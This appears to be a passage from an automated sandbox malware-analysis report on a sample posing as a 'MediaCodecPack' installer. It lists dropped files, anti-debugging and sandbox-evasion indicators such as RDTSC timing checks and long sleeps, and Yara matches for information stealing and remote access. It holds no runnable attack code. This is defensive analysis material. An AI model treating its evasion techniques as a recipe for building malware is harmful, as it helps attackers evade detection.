                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-GC9CG.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_iscrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-FD66D.tmp
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | File created: C:\ProgramData\MediaCodecPack\sqlite3.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | File created: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe

                    Boot Survival

                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0 3_2_02D4E8A7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_00401951 GetLocalTime,StartServiceCtrlDispatcherA,lstrcmpiW, 3_2_00401951
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004241DC IsIconic,SetActiveWindow,SetFocus, 1_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00424194 IsIconic,SetActiveWindow, 1_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00417598 IsIconic,GetCapture, 1_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_0048393C
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00417CCE IsIconic,SetWindowPos, 1_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 1_2_0041F118
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | RDTSC instruction interceptor: First address: 40D6C2 second address: 40D6C2 instructions: 0x00000000 rdtsc 0x00000002 sal si, FFF1h 0x00000006 mov eax, dword ptr [ebp-0Ch] 0x00000009 mov edx, dword ptr [ebp-30h] 0x0000000c rcr esi, FFFFFFD5h 0x0000000f movzx esi, bx 0x00000012 add edx, dword ptr [eax+0Ch] 0x00000015 lahf 0x00000016 cwde 0x00000017 mov eax, dword ptr [ebp-18h] 0x0000001a mov si, cx 0x0000001d movsx esi, si 0x00000020 mov esi, dword ptr [ebp-18h] 0x00000023 mov cl, byte ptr [ecx+esi] 0x00000026 jmp 00007F5204BB6A89h 0x0000002b mov byte ptr [edx+eax], cl 0x0000002e jmp 00007F5204BCDC2Ch 0x00000033 mov eax, dword ptr [ebp-18h] 0x00000036 jmp 00007F5204BB577Ch 0x0000003b inc eax 0x0000003c ror cl, 0000007Bh 0x0000003f btc ecx, FFFFFF83h 0x00000043 mov dword ptr [ebp-18h], eax 0x00000046 jmp 00007F5204BCE270h 0x0000004b mov eax, dword ptr [ebp-28h] 0x0000004e cmp ebp, eax 0x00000050 or ch, cl 0x00000052 mov ecx, dword ptr [ebp-18h] 0x00000055 cmp di, 6D14h 0x0000005a cmp ecx, dword ptr [eax+10h] 0x0000005d jnc 00007F5204BB5BA3h 0x00000063 mov eax, dword ptr [ebp-28h] 0x00000066 jmp 00007F5204BC1A54h 0x0000006b mov ecx, dword ptr [ebp-1Ch] 0x0000006e add si, di 0x00000071 add ecx, dword ptr [eax+14h] 0x00000074 rdtsc
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_0040D6B9 rdtsc 3_2_0040D6B9
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary, 3_2_02D4E9AB
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Window / User API: threadDelayed 5465
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Window / User API: threadDelayed 4461
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-FG1GT.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_shfoldr.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-L8DJ5.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\is-TV2PJ.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\uninstall\unins000.exe (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-38DHO.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-GC9CG.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_iscrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-FD66D.tmp
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-OHUB6.tmp\_isetup\_setup64.tmp
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Evasive API call chain: GetSystemTime,DecisionNodes graph_0-5967
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_3-61654
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | API coverage: 4.8 %
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 2160 | Thread sleep count: 5465 > 30
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 2160 | Thread sleep time: -10930000s >= -30000s
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 6792 | Thread sleep time: -1320000s >= -30000s
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 2160 | Thread sleep count: 4461 > 30
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe TID: 2160 | Thread sleep time: -8922000s >= -30000s
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | File opened: PhysicalDrive0
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00452A60 FindFirstFileA,GetLastError, 1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose, 1_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 1_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose, 1_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00463CDC
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_00409B78
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Thread delayed: delay time: 60000
                    Source: mediacodecpack.exe, 00000003.00000002.2733859980.0000000000808000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWhg7
                    Source: mediacodecpack.exe, 00000003.00000002.2736393238.0000000003370000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: mediacodecpack.exe, 00000003.00000002.2736393238.0000000003370000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWQ}
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | API call chain: ExitProcess graph end node graph_0-6764
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | API call chain: ExitProcess graph end node graph_3-61453
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep graph_3-61550
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_0040D6B9 rdtsc 3_2_0040D6B9
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D53A08 _memset,IsDebuggerPresent, 3_2_02D53A08
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D5E6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 3_2_02D5E6BE
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004502C0
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D45E5E RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_memset,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,_memset,_memset,_memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,_memset,_memset,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection, 3_2_02D45E5E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D580E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_02D580E8
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 1_2_00478504
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 1_2_0042E09C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_02D4E85F cpuid 3_2_02D4E85F
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: GetLocaleInfoA, 0_2_0040520C
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: GetLocaleInfoA, 0_2_00405258
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: GetLocaleInfoA, 1_2_00408568
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: GetLocaleInfoA, 1_2_004085B4
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle, 1_2_004585C8
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_004026C4 GetSystemTime, 0_2_004026C4
                    Source: C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp | Code function: 1_2_0045559C GetUserNameA, 1_2_0045559C
                    Source: C:\Users\user\Desktop\Hbq580QZAR.exe | Code function: 0_2_00405CF4 GetVersionExA, 0_2_00405CF4

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2735509305.0000000002CA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: mediacodecpack.exe PID: 2216, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2735509305.0000000002CA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: mediacodecpack.exe PID: 2216, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,3_2_609660FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,3_2_6090C1D6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,3_2_60963143
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,3_2_6096A2BD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,3_2_6096923E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,3_2_6096A38C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,3_2_6096748C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,3_2_609254B1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,3_2_6094B407
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6090F435 sqlite3_bind_parameter_index,3_2_6090F435
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,3_2_609255D4
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_609255FF sqlite3_bind_text,3_2_609255FF
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,3_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,3_2_6094B54C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,3_2_60925686
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,3_2_6094A6C5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,3_2_609256E5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,3_2_6094B6ED
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6092562A sqlite3_bind_blob,3_2_6092562A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,3_2_60925655
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,3_2_6094C64A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,3_2_609687A7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,3_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,3_2_6092570B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095F772
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,3_2_60925778
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6090577D sqlite3_bind_parameter_name,3_2_6090577D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,3_2_6094B764
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6090576B sqlite3_bind_parameter_count,3_2_6090576B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,3_2_6094A894
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,3_2_6095F883
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,3_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe | Code function: 3_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,3_2_6096281E
